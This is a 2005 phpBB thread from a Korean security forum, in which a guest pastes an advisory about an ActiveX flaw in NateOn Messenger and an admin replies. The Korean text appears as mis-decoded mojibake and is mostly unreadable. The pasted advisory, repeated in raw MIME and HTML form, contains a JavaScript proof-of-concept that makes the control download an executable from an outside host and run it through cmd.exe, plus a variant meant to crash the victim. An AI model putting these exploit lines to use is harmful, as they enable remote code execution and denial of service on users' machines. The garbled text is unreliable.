|
Ä¿ÇÇÇâÀÌ ³ª´Â *NIX
Ä¿ÇǴнº
½Ã½ºÅÛ/³×Æ®¿÷/º¸¾ÈÀ» ´Ù·ç´Â °÷
|
|
|
|
| ÀÌÀü ÁÖÁ¦ º¸±â :: ´ÙÀ½ ÁÖÁ¦ º¸±â |
| ±Û¾´ÀÌ |
¸Þ½ÃÁö |
ÂÞ´Ï´õ½½ÆÛ
¼Õ´Ô
|
 ¿Ã·ÁÁü: 2005.12.06 È, 12:15 am ÁÖÁ¦: ÇìÇì ¿î¿µÀÚºÐÀÌ Ä£ÀýÇϽðí ÁÁ³×¿ä... |
 |
|
³×ÀÌÆ®¿Â ¶§¹®¿¡¿ä...
¹¹ ÇÑ°¡Áö ´õ ¹°¾îº¼²²¿ä...
±¸±Û °Ë»öÇÏ´Ù°¡ º»°Çµ¥¿©...
¢º³×ÀÌÆ®¿Â ´ÙÁß º¸¾È Ãë¾àÁ¡ ±Ç°í¹®³×ÀÌÆ®¿Â ´ÙÁß Ãë¾àÁ¡
±Ç°í¹®ÀÌ ¹ßÇ¥µÇ¾ú½À´Ï´Ù.
¿ª½Ã Áö³¹ø¿¡ ³×ÀÌÆ®¿Â º¸¾È Ãë¾àÁ¡ ±Ç°í¹®À»
¹ßÇ¥ÇÑ ¹Ú±ÔÅ ¾¾°¡ ¹ß°ßÇÑ °ÍÀ̱º¿ä.
ÀÓÀÇÀÇ ÆÄÀÏÀ» ¾÷·Îµå ÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡°ú ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ÀÇ °áÇÕÀ̶ó
¸é ÇÇÇØÀÚÀÇ ¼¹ö¿¡ ¾Ç¼º ÇÁ·Î±×·¥À» ¾÷·ÎµåÇÏ¿© ½ÇÇà½ÃÅ°´Â °ø°Ý ½Ã³ª¸®¿À°¡
°¡´ÉÇÏ°Ú±º¿ä.¢¸
¾îµð¿¡ µû¸¥ Ãë¾àÁ¡ Àϱî¿ä?
¶Ç ÀÌ Ãë¾àÁ¡À¸·Î Á¢±ÙÇÏ·Á¸é ¾î¶»°Ô ÇؾßÇÏ°í... ¹öÆÛ¿À¹öÇ÷¯¿ì´Â
¹«¾ùÀΰ¡¿ä?
¹öÆÛ°¡ ³ÑÃij´Ù ÀÌ·±¶æÀΰ¡¿©?
ÀÌ°Ç ÆÝ±Û ÀÌ¿¹¿ä...
This is a multi-part message in MIME format.
--===============2108474384==
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_009F_01C5C4EA.07FD7690"
This is a multi-part message in MIME format.
------=_NextPart_000_009F_01C5C4EA.07FD7690
Content-Type: text/plain;
charset="ks_c_5601-1987"
Content-Transfer-Encoding: 7bit
Title: Arbitrary File Download by NateOn Messagener's ActiveX
and DoS
Discoverer: PARK, GYU TAE (saintlinu@null2root.org)
Advisory No.: NRVA05-08
Critical: Moderately Critical
Impact: Arbitrary file download by NateOn Messagener's ActiveX
and DoS
Where: From remote
Operating System: Windows Only
Solution: unpatch yet
Workaround: N / A
Notice: 09. 17. 2005 Initiate notified
09. 23. 2005 2nd notified
09. 27. 2005 3rd notified
09. 29. 2005 Vendor didn't response. Disclosure
vulnerability
Description:
The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such
as MSN, YAHOO and so on
If installed NateOn Messenger then can exploit by
'NateonDownloadManager.ocx' ActiveX
and there is another vulnerability like Buffer Overflow
See following detail describe:
NOT INCLUDED HERE BUT A PIECE OF CODE
<--snip-->
i = GotNate.IsNateonInstall();
if( i == 1 ) {
alert('NateOn Messenger already installed. Do
Attack ...');
// if you want to second order attack then try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\
system32\\cmd.exe');
// if you want to crash to victim system the try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str
ings_in_here');
} else {
alert('NateOn Messenger NOT Installed');
}
</--snip-->
------=_NextPart_000_009F_01C5C4EA.07FD7690
Content-Type: text/html;
charset="ks_c_5601-1987"
Content-Transfer-Encoding: quoted-printable
<html xmlns:o=3D"urn:schemas-microsoft-com:office:office" =
xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns=3D"http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dks_c_5601-1987">
<meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Font Definitions */
@font-face
{font-family:=B9=D9=C5=C1;
panose-1:2 3 6 0 0 1 1 1 1 1;}
@font-face
{font-family:=B1=BC=B8=B2;
panose-1:2 11 6 0 0 1 1 1 1 1;}
@font-face
{font-family:"\@=B1=BC=B8=B2";
panose-1:2 11 6 0 0 1 1 1 1 1;}
@font-face
{font-family:"\@=B9=D9=C5=C1";
panose-1:2 3 6 0 0 1 1 1 1 1;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
text-align:justify;
text-justify:inter-ideograph;
text-autospace:none;
word-break:break-hangul;
font-size:10.0pt;
font-family:=B9=D9=C5=C1;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
span.EmailStyle17
{mso-style-type:personal-compose;
font-family:=B1=BC=B8=B2;
color:windowtext;}
/* Page Definitions */
@page Section1
{size:595.3pt 841.9pt;
margin:99.25pt 3.0cm 3.0cm 3.0cm;
layout-grid:18.0pt;}
div.Section1
{page:Section1;}
-->
</style>
</head>
<body lang=3DKO link=3Dblue vlink=3Dpurple>
<div class=3DSection1 style=3D'layout-grid:18.0pt'>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Title:  =
;
Arbitrary File Download by NateOn Messagener's ActiveX and =
DoS<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Discoverer: =
PARK, GYU
TAE (saintlinu@null2root.org)<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Advisory No.: =
NRVA05-08<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Critical: &n=
bsp;
Moderately Critical<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Impact: &nbs=
p;
Arbitrary file download by NateOn Messagener's ActiveX and =
DoS<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Where:  =
;
>From remote<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Operating System: Windows =
Only<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Solution: &n=
bsp;
unpatch yet<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Workaround: =
N / A<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Notice: &nbs=
p;
09. 17. 2005 Initiate notified<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> =
&=
nbsp; 09.
23. 2005 2nd notified<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
;
09. 27. 2005 3rd notified<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
;
09. 29. 2005 Vendor didn't response. Disclosure =
vulnerability<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Description: <o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>The NateOn Messenger(See a NRVA05-02) is =
Internet Instance
Messenger such as MSN, YAHOO and so on<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>If installed NateOn Messenger then can exploit =
by
'NateonDownloadManager.ocx' ActiveX<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>and there is another vulnerability like Buffer =
Overflow<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>See following detail =
describe:<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>NOT INCLUDED HERE BUT A PIECE OF =
CODE<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><--snip--><o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; i
=3D GotNate.IsNateonInstall();<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; <o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; if(
i =3D=3D 1 ) {<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
alert('NateOn
Messenger already installed. Do Attack =
...');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
//
if you want to second order attack then try<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
i
=3D
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','=
c:\\windows\\system32\\cmd.exe');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
//
if you want to crash to victim system the =
try<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
</span></font><font
face=3D=B1=BC=B8=B2><span style=3D'font-family:=B1=BC=B8=B2'>i =3D
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','=
very_long_strings_in_here');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; }
else {<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; =
</span></font><font
face=3D=B1=BC=B8=B2><span lang=3DEN-US =
style=3D'font-family:=B1=BC=B8=B2'>alert('NateOn Messenger NOT
Installed');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>  =
; }<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'></--snip--><o:p></o:p></span></font></p>
</div>
</body>
</html>
------=_NextPart_000_009F_01C5C4EA.07FD7690--
________________________________________________________ |
|
| À§·Î |
|
 |
truefeel
Ä«Æä °ü¸®ÀÚ
°¡ÀÔ: 2003³â 7¿ù 24ÀÏ
¿Ã¸° ±Û: 1277
À§Ä¡: ´ëÇѹα¹
|
| ¿Ã·ÁÁü: 2005.12.11 ÀÏ, 12:44 am ÁÖÁ¦: Re: ÇìÇì ¿î¿µÀÚºÐÀÌ Ä£Àý.... (³×ÀÌÆ®¿Â °ü·Ã) |
|
|
Á¦¸ñ º¸°í ¾î¶² °ÍÀ» Áú¹®ÇÑ °ÍÀÎÁö ÀüÇô ¾Ë ¼ö°¡ ¾ø½À´Ï´Ù. ±Û Á¦¸ñÀº º¸´Ù ¾Ë±â½±°Ô ½áÁÖ¼¼¿ä.
Àú Á¦¸ñÀ̶ó¸é ÀÚÀ¯°Ô½ÃÆÇ¿¡ ¾î¿ï¸± °Í °°½À´Ï´Ù. ^^
| ÂÞ´Ï´õ½½ÆÛ ¾¸: | ³×ÀÌÆ®¿Â ¶§¹®¿¡¿ä...
¹¹ ÇÑ°¡Áö ´õ ¹°¾îº¼²²¿ä...
±¸±Û °Ë»öÇÏ´Ù°¡ º»°Çµ¥¿©...
¢º³×ÀÌÆ®¿Â ´ÙÁß º¸¾È Ãë¾àÁ¡ ±Ç°í¹®³×ÀÌÆ®¿Â ´ÙÁß Ãë¾àÁ¡
±Ç°í¹®ÀÌ ¹ßÇ¥µÇ¾ú½À´Ï´Ù.
¿ª½Ã Áö³¹ø¿¡ ³×ÀÌÆ®¿Â º¸¾È Ãë¾àÁ¡ ±Ç°í¹®À»
¹ßÇ¥ÇÑ ¹Ú±ÔÅ ¾¾°¡ ¹ß°ßÇÑ °ÍÀ̱º¿ä.
ÀÓÀÇÀÇ ÆÄÀÏÀ» ¾÷·Îµå ÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡°ú ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ÀÇ °áÇÕÀ̶ó
¸é ÇÇÇØÀÚÀÇ ¼¹ö¿¡ ¾Ç¼º ÇÁ·Î±×·¥À» ¾÷·ÎµåÇÏ¿© ½ÇÇà½ÃÅ°´Â °ø°Ý ½Ã³ª¸®¿À°¡
°¡´ÉÇÏ°Ú±º¿ä.¢¸
¾îµð¿¡ µû¸¥ Ãë¾àÁ¡ Àϱî¿ä?
¶Ç ÀÌ Ãë¾àÁ¡À¸·Î Á¢±ÙÇÏ·Á¸é ¾î¶»°Ô ÇؾßÇÏ°í...
|
ÀÌÀü¿¡µµ Áú¹®À» ¿Ã¸®¼ÌÁö¸¸ ³×ÀÌÆ®¿Â, ½ÎÀ̸¦ ÁÁÁö ¾Ê´Â ¹æÇâÀ¸·Î »ç¿ëÇÏ·Á´Â Àǵµ°¡ ¸¹À¸½Ã³×¿ä.
ÀÌ·± ºÎºÐ¿¡ ´ëÇØ ÁýÂøÇÏÁö ¸¶¼¼¿ä.
³×ÀÌÆ®¿ÂÀÇ º¸¾È¹®Á¦¿¡ ´ëÇؼ´Â null@rootÀÇ ¹Ú±Ôö¾¾°¡ 2-3¹ø Á¤µµ ¹ßÇ¥ÇÑ ÀûÀÌ ÀÖ½À´Ï´Ù.
³×ÀÌÆ®¿ÂÀÇ ÆÄÀÏ°øÀ¯±â´ÉÀÇ ¹®Á¦·Î °øÀ¯ÇÏÁö ¾ÊÀº ÆÄÀÏ¿¡ ´ëÇؼµµ Á¢±ÙÇÒ ¼ö ÀÖ¾ú´ø ¹®Á¦µµ ÀÖ¾ú½À´Ï´Ù.
http://secunia.com/advisories/15819/
http://secunia.com/advisories/16983/
ÇÏÁö¸¸ ÀÌÁ¦ À§ÀÇ Ãë¾àÁ¡À¸·Î Á¢±ÙÇÏ´Â °ÍÀº ¾ÈµÈ´Ù¶ó°í º¸½Ã¸é µË´Ï´Ù.
ÀÚµ¿¾÷µ¥ÀÌÆ®°¡ µÇ±â ¶§¹®¿¡.
| ÂÞ´Ï´õ½½ÆÛ ¾¸: |
¹öÆÛ¿À¹öÇ÷¯¿ì´Â ¹«¾ùÀΰ¡¿ä?
¹öÆÛ°¡ ³ÑÃij´Ù ÀÌ·±¶æÀΰ¡¿©? |
¹öÆÛ¿À¹öÇ÷οì(Buffer Overflow)´Â ¹öÆÛ(µ¥ÀÌÅ͸¦ Àӽà Á¤ÇÏ´Â °ø°£À¸·Î º¸½Ã¸é µË´Ï´Ù.)Å©±âº¸´Ù ´õ Å« µ¥ÀÌÅ͸¦ º¸³»¼ ¹öÆÛ¸¦ ä¿ì´Â °Í(overflow)À» ¸»ÇÕ´Ï´Ù.
±×·±µ¥, ÇÔ¼ö È£ÃâÀ» ÇÏ°Ô µÇ¸é ȸ½Å ÁÖ¼Ò(return address)°¡ ¹öÆÛ(½ºÅÃ)¿¡ pushµË´Ï´Ù.
ÀÌ ¶§ °ø°ÝÀÚ°¡ ¿À¹öÇÃ·Î¿ì ¹®Á¦¸¦ ÅëÇØ È¸½ÅÁÖ¼Ò¸¦ °ø°ÝÀÚ°¡ ÁöÁ¤ÇÑ ÁÖ¼Ò·Î ¹Ù²Ù°Ô µÇ¸é ¾î¶»°Ô µÉ±î¿ä?
°ø°ÝÀÚÀÇ ¾ÇÀÇÀû Äڵ尡 µé¾îÀÖ´Â ÁÖ¼Ò·Î returnÀÌ µÇ°í ±× ÄÚµåµéÀÌ ½ÇÇàÀÌ µÉ°Ì´Ï´Ù.
root ±ÇÇÑÀ» ¾òÀ» ¼öµµ ÀÖ°í, ÀÓÀÇ ÇÁ·Î±×·¥À» ½ÇÇàÇÒ ¼öµµ ÀÖ´Â °ÍÀÔ´Ï´Ù.
¹öÆÛ ¿À¹öÇ÷ο쿡 ´ëÇؼ´Â
* º¸¾È(security) > º¸¾È¹®¼ - ÇØÅ· / °ø°Ý ( http://coffeenix.net/?cata_code=88 ) Ä«Å×°í¸®³ª
* ±¸±Û¸µÀ» Çغ¸¸é ¸¹ÀÌ ³ª¿Ã°Ì´Ï´Ù. |
|
| À§·Î |
|
|
|
|
»õ·Î¿î ÁÖÁ¦¸¦ ¿Ã¸± ¼ö ¾ø½À´Ï´Ù
´ä±ÛÀ» ¿Ã¸± ¼ö ¾ø½À´Ï´Ù
ÁÖÁ¦¸¦ ¼öÁ¤ÇÒ ¼ö ¾ø½À´Ï´Ù
¿Ã¸° ±ÛÀ» »èÁ¦ÇÒ ¼ö ¾ø½À´Ï´Ù
ÅõÇ¥¸¦ ÇÒ ¼ö ¾ø½À´Ï´Ù
|
Powered by phpBB © 2001, 2005 phpBB Group
|
FAQ
°Ë»ö
¸â¹ö¸®½ºÆ®
»ç¿ëÀÚ ±×·ì
»ç¿ëÀÚ µî·ÏÇϱâ
°³ÀÎ Á¤º¸
ºñ°ø°³ ¸Þ½ÃÁö¸¦ È®ÀÎÇÏ·Á¸é ·Î±×ÀÎÇϽʽÿÀ
·Î±×ÀÎ
°¡ÀÔ¾øÀÌ ´©±¸³ª ±ÛÀ» ¾µ ¼ö ÀÖ½À´Ï´Ù. °øÁö»çÇ׿¡ ´ëÇÑ ´ñ±Û±îÁöµµ..
BBS >>
¼³Ä¡, ¿î¿µ Q&A |
³×Æ®¿÷, º¸¾È Q&A |
ÀÏ¹Ý Q&A ||
Á¤º¸¸¶´ç |
AWS ||
ÀÚÀ¯°Ô½ÃÆÇ |
±¸Àα¸Á÷ ||
°øÁö»çÇ× |
ÀÇ°ßÁ¦½Ã
